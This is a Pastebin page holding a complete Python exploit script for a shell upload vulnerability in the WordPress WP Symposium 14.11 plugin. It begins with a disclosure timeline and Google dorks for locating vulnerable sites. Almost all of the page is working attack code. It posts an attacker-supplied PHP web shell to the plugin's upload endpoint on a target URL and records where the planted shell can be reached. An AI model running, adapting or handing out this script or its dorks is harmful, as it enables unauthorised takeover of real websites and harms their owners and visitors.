Googleinurl

[EXPLOIT]Sh311 Upl04d Vuln3r4b1l1ty Wp-Symposium v14.11

Dec 11th, 2014
951
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. #-------------------------------------------------------------------------------
  3. # Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
  4. # Vulnerability discovered by Claudio Viviani - http://www.homelab.it
  5. # Exploit written by Claudio Viviani / Edited INURL - BRASIL
  6. # 2014-11-27:  Discovered vulnerability
  7. # 2014-12-01:  Vendor Notification (Twitter)
  8. # 2014-12-02:  Vendor Notification (Web Site)
  9. # 2014-12-04:  Vendor Notification (E-mail)
  10. # 2014-12-11:  No Response/Feedback
  11. # 2014-12-11:  Published
  12. # DORK:  index of "wp-symposium"
  13. # DORK:  inurl:"plugins/wp-symposium" -site:wordpress.org
  14. # Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
  15. #-------------------------------------------------------------------------------
  16. import urllib, urllib2, socket
  17. import sys
  18. import string, random
  19. import optparse
  20. import os, os.path, mimetypes
  21. import datetime
  22. import os
  23.  
  24. def checkurl(url):
  25.     if url[:8] != "https://" and url[:7] != "http://":
  26.         print('[X] You must insert http:// or https:// procotol')
  27.         sys.exit(1)
  28.     else:
  29.         return url
  30.  
  31. def checkfile(file):
  32.     if not os.path.isfile(file) and not os.access(file, os.R_OK):
  33.         print '[X] '+file+' file is missing or not readable'
  34.         sys.exit(1)
  35.     else:
  36.         return file
  37. # Get file's mimetype
  38. def get_content_type(filename):
  39.     return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
  40.  
  41. def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
  42.     return ''.join(random.choice(chars) for _ in range(size))
  43.  
  44.  
  45. # Create multipart header
  46. def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
  47.  
  48.    getfields = dict()
  49.    getfields['uploader_uid'] = '1'
  50.    getfields['uploader_dir'] = './'+randDirName
  51.    getfields['uploader_url'] = url_symposium_upload
  52.  
  53.    payloadcontent = open(payloadname).read()
  54.  
  55.    LIMIT = '----------lImIt_of_THE_fIle_eW_$'
  56.    CRLF = '\r\n'
  57.  
  58.    L = []
  59.    for (key, value) in getfields.items():
  60.       L.append('--' + LIMIT)
  61.       L.append('Content-Disposition: form-data; name="%s"' % key)
  62.       L.append('')
  63.       L.append(value)
  64.  
  65.    L.append('--' + LIMIT)
  66.    L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
  67.    L.append('Content-Type: %s' % get_content_type(payloadname))
  68.    L.append('')
  69.    L.append(payloadcontent)
  70.    L.append('--' + LIMIT + '--')
  71.    L.append('')
  72.    body = CRLF.join(L)
  73.    return body
  74.  
  75. banner = """
  76. 0x[EXPLOIT NAME]: Sh311 Upl04d Vuln3r4b1l1ty Wp-Symposium v14.11 / INURL - BRASIL
  77. ------------------------------------------------------------------------------------------------------------------
  78. """
  79.  
  80. commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
  81. commandList.add_option('-t', '--target', action="store",
  82.                   help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
  83.                   )
  84. commandList.add_option('-f', '--file', action="store",
  85.                   help="Insert file name, ex: shell.php",
  86.                   )
  87. commandList.add_option('--timeout', action="store", default=10, type="int",
  88.                   help="[Timeout Value] - Default 10",
  89.                   )
  90.  
  91. options, remainder = commandList.parse_args()
  92.  
  93. # Check args
  94. if not options.target or not options.file:
  95.     print(banner)
  96.     commandList.print_help()
  97.     sys.exit(1)
  98.  
  99. payloadname = checkfile(options.file)
  100. host = checkurl(options.target)
  101. timeout = options.timeout
  102.  
  103. print(banner)
  104.  
  105. socket.setdefaulttimeout(timeout)
  106.  
  107. url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'
  108.  
  109. content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
  110.  
  111. randDirName = id_generator()
  112. randShellName = id_generator()
  113.  
  114. bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)
  115.  
  116. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  117.            'content-type': content_type,
  118.            'content-length': str(len(bodyupload)) }
  119.  
  120. try:
  121.     req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
  122.     response = urllib2.urlopen(req)
  123.     read = response.read()
  124.  
  125.     if "error" in read or read == "0" or read == "":
  126.        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  127.        print('0x' + str(now) + '[INFO][NOT VULN]: Upload Failed')
  128.     else:
  129.        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  130.        print('0x' + str(now) + '[INFO][VALUE]: Shell Uploaded')
  131.        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  132.        print('0x' + str(now) + '[INFO][VALUE]: Location: '+url_symposium_upload+randDirName+randShellName+'.php')
  133.        file_saved = 'poffOUTPUT_Sh311_Upl04d_Vuln3r4b1l1ty.txt'
  134.  
  135.        msg = '0x[INFO][FILE SAVED]: '+file_saved + "\n"
  136.        url_saved = url_symposium_upload+randDirName+randShellName+".php\n"
  137.     if os.path.exists(file_saved):
  138.        arquivo = open(file_saved, 'a')
  139.        arquivo.write(url_saved)
  140.        arquivo.close()
  141.        print(msg)
  142.     else:
  143.        arquivo = open(file_saved, 'w')
  144.        arquivo.write(url_saved)
  145.        arquivo.close()
  146.        print(msg)
  147.  
  148. except urllib2.HTTPError as e:
  149.     now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  150.     print('0x' + str(now) + '[INFO][ERROR]: '+str(e))
  151. except urllib2.URLError as e:
  152.     now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
  153.     print('0x' + str(now) + '[INFO][ERROR]: Connection Error: '+str(e))
RAW Paste Data